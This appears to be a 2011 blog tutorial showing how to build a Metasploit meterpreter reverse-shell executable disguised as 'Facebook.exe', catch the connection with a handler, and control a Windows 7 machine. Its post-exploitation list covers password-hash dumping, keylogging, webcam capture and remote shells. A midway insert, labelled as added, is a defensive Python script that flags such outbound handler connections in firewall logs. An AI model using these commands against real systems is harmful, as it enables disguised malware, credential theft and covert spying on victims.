Saturday 10 December 2011

Exploiting Windows 7 with Metasploit/BackTrack 5

So I'm going to take some time to show you how to exploit a Windows 7 machine using Metasploit. Please note that this is just a simple demonstration and as such, my victim PC has Windows Firewall disabled and no antivirus in place. Either of these measures would easily prevent this exploit from taking place. I am also assuming that you've already got network connectivity between the victim and the hacker. Here are the details of my setup:

Victim PC = My host machine running Windows 7
Victim PC IP address = 192.168.0.30

Hacker PC = VMWare Workstation running a BackTrack 5 virtual machine
Hacker PC IP address = 192.168.72.130

To get started, we're going to open up a terminal in BackTrack and navigate to the Metasploit directory. The command to do this is cd /opt/framework/msf3

Next we're going to create our payload and export it into an .exe file that we will use to make the connection between the hacker and victim. The command to create the payload is ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.72.130 LPORT=4444 X > /root/Desktop/Facebook.exe (the output-format option is a capital X, which tells msfpayload to write a Windows executable).

Note: in this command you will replace the address of MY hacker PC (192.168.72.130) with the address of YOUR hacker PC. Leave everything else the same.

This command will create the file called Facebook.exe and place it on the Desktop of our BackTrack VM. In a real-life scenario, at this point you'd have to figure out a way to get that file onto the victim's PC and get them to run it. However, in this case I'm just going to drag the file out of my virtual machine and onto the desktop of my host machine (DO NOT RUN Facebook.exe YET!). You should be at this point now:

So now the setup phase is done - we've created our payload, figured out a way to get the file onto the victim's computer and now we are ready for the actual exploit to take place.

At this point you're going to use the command ./msfconsole to launch Metasploit. This may take a while to load especially if it's your first time launching the program. After Metasploit launches you should see a screen similar to this:

Now we're going to type the command use exploit/multi/handler and press Enter. Then we will type set LHOST 192.168.72.130 and press Enter. Then type set LPORT 4444 and press Enter. Again, remember to change the address to match that of your OWN hacker PC, and leave the port number the same.

Now if you type the command exploit and press Enter, Metasploit will launch the payload handler. What this does is start a listener on port 4444 of our hacker machine and wait for the victim's PC to connect back to it (that connection is created when they open the Facebook.exe file, which is why this is called a reverse TCP payload).
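Because a reverse_tcp payload makes the victim connect out to the handler, the defender-side signal is an allowed outbound connection to an unexpected host and port, not an inbound one. The following is an added example (not part of the original post) that parses Windows Firewall log lines in the pfirewall.log format and flags outbound TCP connections to a watchlist of handler ports or to addresses outside the trusted LAN. The log lines, the 192.168.0.0/24 trusted range and the port watchlist are constructed for the demo and reuse the lab addresses above; adjust them for your own environment.

```python
"""Flag suspicious outbound connections in Windows Firewall log lines.

Added example, not from the original post. SAMPLE_LOG is constructed to
mimic the pfirewall.log format Windows Firewall writes when logging of
allowed connections is enabled (Fields: date time action protocol src-ip
dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype
icmpcode info path). The addresses reuse the lab setup from the post.
"""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Constructed sample log: normal web/DNS traffic, one outbound connection
# to the handler on 4444, and one dropped inbound SMB attempt.
SAMPLE_LOG = """#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2011-12-10 14:21:55 ALLOW TCP 192.168.0.30 192.168.0.1 49230 80 0 - 0 0 0 - - - SEND
2011-12-10 14:22:01 ALLOW TCP 192.168.0.30 192.168.72.130 49231 4444 0 - 0 0 0 - - - SEND
2011-12-10 14:22:03 ALLOW UDP 192.168.0.30 192.168.0.1 53412 53 0 - - - - - - - SEND
2011-12-10 14:22:07 DROP TCP 192.168.72.130 192.168.0.30 51000 445 0 - 0 0 0 - - - RECEIVE
"""

# Assumption: a static watchlist of common handler ports is enough here.
# 4444 is the port the post uses; extend for your environment.
SUSPICIOUS_PORTS = {4444, 4445}
# Constructed: the networks the victim is expected to talk to.
TRUSTED_NETS = [ipaddress.ip_network("192.168.0.0/24")]


@dataclass
class FwRecord:
    date: str
    time: str
    action: str      # ALLOW or DROP
    protocol: str    # TCP, UDP, ...
    src_ip: str
    dst_ip: str
    src_port: Optional[int]
    dst_port: Optional[int]
    path: str        # SEND (outbound) or RECEIVE (inbound)


def _port(value: str) -> Optional[int]:
    """Port fields are '-' for protocols without ports (e.g. ICMP)."""
    return int(value) if value.isdigit() else None


def parse_firewall_log(text: str) -> List[FwRecord]:
    """Parse pfirewall.log text; comment/header lines start with '#'."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 17:
            continue  # malformed or truncated line; skip it
        records.append(FwRecord(f[0], f[1], f[2], f[3], f[4], f[5],
                                _port(f[6]), _port(f[7]), f[16]))
    return records


def reasons(rec: FwRecord) -> List[str]:
    """Explain why an allowed outbound TCP record is suspicious.

    Returns an empty list when the record is not flagged."""
    if rec.path != "SEND" or rec.protocol != "TCP" or rec.action != "ALLOW":
        return []
    out = []
    if rec.dst_port in SUSPICIOUS_PORTS:
        out.append(f"dst port {rec.dst_port} is on the handler watchlist")
    dst = ipaddress.ip_address(rec.dst_ip)
    if not any(dst in net for net in TRUSTED_NETS):
        out.append(f"dst {rec.dst_ip} is outside the trusted networks")
    return out


def find_suspicious(records: Iterable[FwRecord]) -> List[Tuple[FwRecord, List[str]]]:
    """Return (record, reasons) for every flagged outbound connection."""
    flagged = []
    for rec in records:
        why = reasons(rec)
        if why:
            flagged.append((rec, why))
    return flagged


if __name__ == "__main__":
    for rec, why in find_suspicious(parse_firewall_log(SAMPLE_LOG)):
        print(f"{rec.date} {rec.time} {rec.src_ip}:{rec.src_port} -> "
              f"{rec.dst_ip}:{rec.dst_port}  {'; '.join(why)}")
```

Run against the constructed sample, only the 14:22:01 connection to 192.168.72.130:4444 is reported, for two reasons (watchlisted port and off-LAN destination); the DROP/RECEIVE line is ignored because an inbound attempt the firewall already blocked is not the pattern a reverse shell produces. With logging of allowed connections enabled, the same logic runs over a real pfirewall.log.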

So at this point your screen should look like this:

Now the fun begins... If you now double-click on the Facebook.exe file we copied to the Windows 7 victim PC, the payload handler in Metasploit will receive the connection and connect you to the victim PC. You should see something like this:

You now have a Meterpreter prompt, which essentially gives you control of the victim's machine. You can issue the command help at the Meterpreter prompt for a list of some of the cool things you can do to the victim, but here is a list of the more common ones:

sysinfo - get basic system info
hashdump - dumps the password hashes from the SAM database
screenshot - takes a screenshot of the victim's desktop
webcam_snap - takes a picture with the victim's webcam
keyscan_start - start key-logging
keyscan_dump - dump the captured keystrokes (after using keyscan_start)
ps - list all running processes
shell - gives you a command shell on the victim's PC

So that's pretty much it... This is just one of the many ways to exploit a machine using Metasploit. Let me know if you have any questions or comments.